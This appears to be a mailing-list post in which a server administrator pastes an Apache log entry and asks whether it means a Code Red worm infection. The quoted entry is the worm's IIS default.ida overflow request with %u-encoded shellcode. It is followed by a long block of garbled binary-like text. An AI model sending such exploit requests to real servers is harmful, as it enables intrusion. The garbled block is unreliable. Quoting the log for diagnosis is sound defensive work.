I just looked again in my apache logs and I found an interesting entry. It looks like
all the other code red
entries I have but it is 1.78 megs of "code" can anyone tell me what this is? should I
be worried about being
infected? I was informed that only iis was susceptible to the worm but I have been
monitoring my server just the
same there are a ton of enties looking for default.ida?XXXXXXXX.... but only one of
these.
Please help
Frederic:
"GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 279
H T
M . �� sD � . 9 . H T M . .? h< � . 4 0 . H T M . .? ?; � . 1 . H T
M . ȗ d= � . 2 . H T
M . ӗ xA � . 3 . H T M . ӗ jA � . 4 . H T M . ޗ �B � . 5 . H T M
. � �< � . 6 . H T M
. � 3= � . 7 . H T M . �� +? � . 8 . H T M . �� �> � . 9 . H T M .
�� V= � . 5 0 . H T M .
� �< � . 1 . H T M . .� �A � . 2 . H T M . .� �> � . 3 . H T M . �
+H � . 4 . H T M . +�
�C � . 5 . H T M . +� MC � . 6 . H T M . 6� .N � . 7 . H T M . A� �V
� . 8 . H T M . A� .A
� . 9 . H T M . L� �= � . 6 0 . H T M . W� �C � . 1 . H T M . W� �>
� . 2 . H T M . b� �P �
. 3 . H T M . b� �S � . 4 . H T M . m� .G � . 5 . H T M . x� )E � .
6 . H T M . x� �E � . 7
. H T M . �� �D � . 8 . H T M . �� @O � . 9 . H T M . �� �\ � . 7 0
. H T M . �� �Y � . 1 .
H T M . �� �Y � . 2 . H T M . �� :V � . 3 . H T M . �� �H � . 4 . H
T M . �� oE � . 5 . H T
M . �� .F � . 6 . H T M . �� �E � . 7 . H T M . �� �E � . 8 . H T M
. Ř �E � . 9 . H T M
. Ř �E � . 8 0 . H T M . И fB � . 1 . H T M . И .= � . 2 . H T M
. ۘ �< � . 3 . H T M
. � �D � . 4 . H T M . � �D � . 5 . H T M . � �> � . 6 . H T M .
� n@ � . 7 . H T M .
�� ^D � . 8 . H T M . �� GA � . 9 . H T M . .� ?D � . 9 0 . H T M .
.� �D � . 1 . H T M .
.� .? �������������������� � W W W R O O T \ D A T A B Y D E S I G N 1 \ C F D O C
S \ C F M L _ L A N G U A G E
_ R E F E R E N C E \ 3 _ C O L D F U S I O N _ F U N C T I O N S \ L R 3 _ 0 9 2 . H
T M . .� bC � . 3 . H T
M . .� �C � . 4 . H T M . .� .B � . 5 . H T M . (� CB � . 6 . H T M
. 3� /> � . 7 . H T M
. 3� qA � . 8 . H T M . >� �A � . 9 . H T M . >� �= . 1 0 0 . H T M
. I� )< � . 1 . H T M
. T� .A � . 2 . H T M . T� @? � . 3 . H T M . _� ?D � . 4 . H T M .
_�
D � . 5 . H T M . j� �: � . 6 . H T M . j� sK � . 7 . H T M . u� 9H
� . 8 . H T M . u� 4K
� . 9 . H T M . �� �= � . 1 0 . H T M . �� K> � . 1 . H T M . �� |>
� . 2 . H T M . �� r= �
. 3 . H T M . �� OF � . 4 . H T M . �� �D � . 5 . H T M . �� �> � .
6 . H T M . �� .O � . 7
. H T M . �� $Q � . 8 . H T M . �� _Y � . 9 . H T M . �< � . 2 0
. H T M . {B � . 1 .
H T M . ͙ C � . 2 . H T M . ͙ �< � . 3 . H T M . ؙ /> � . 4 . H
T M . ؙ �A � . 5 . H T
M . � <Y � . 6 . H T M . � �A � . 7 . H T M . � �? � . 8 . H T M
. � iC � . 9 . H T M
. �� �: � . 3 0 . H T M . �� _B � . 1 . H T M . .� �? � . 2 . H T M
. .� j? � . 3 . H T M
. .� �D � . 4 . H T M . .� �\ � . 5 . H T M . .� �@ � . 6 . H T M .
%� g@ � . 7 . H T M .
0� �C � . 8 . H T M . 0� UA � . 9 . H T M . ;� n> � . 4 0 . H T M .
;� .D � . 1 . H T M .
F� !@ � . 2 . H T M . Q� F � . 3 . H T M . Q� �B � . 4 . H T M . \�
�I � . 5 . H T M . \�
�B � . 6 . H T M . g� �C � . 7 . H T M . r� .I � . 8 . H T M . r� �B
� . 9 . H T M . }� �@
� . 5 0 . H T M . }� ?D � . 1 . H T M . �� �F � . 2 . H T M . �� .@
� . 3 . H T M . �� �A �
. 4 . H T M . �� "E � . 5 . H T M . �� \O � . 6 . H T M . �� �A � .
7 . H T M . �� XI � . 8
. H T M . �� FJ � . 9 . H T M . �� �@ � . 6 0 . H T M . �� �J � . 1
. H T M . �� BK � . 2 .
H T M . ʚ N? � . 3 . H T M . ՚ .C � . 4 . H T M . ՚ �B � . 5 . H
T M . �� $` � . 6 . H T
M . �� DN � . 7 . H T M . � �d � . 8 . H T M . � �> � . 9 . H T M
. �� .? � . 7 0 . H T
M . �� �= � . 1 . H T M . .� gf � . 2 . H T M . .� �` � . 3 . H T M
. .� �R � . 4 . H T M
. .� �H � . 5 . H T M . .� TC � . 6 . H T M . "� �J � . 7 . H T M .
"� �= � . 8 . H T M .
-� �? � . 9 . H T M . -� .D � . 8 0 . H T M . 8� �? � . 1 . H T M .
8� �> � . 2 . H T M .
C� �C � . 3 . H T M .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Structure your ColdFusion code with Fusebox. Get the official book at
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
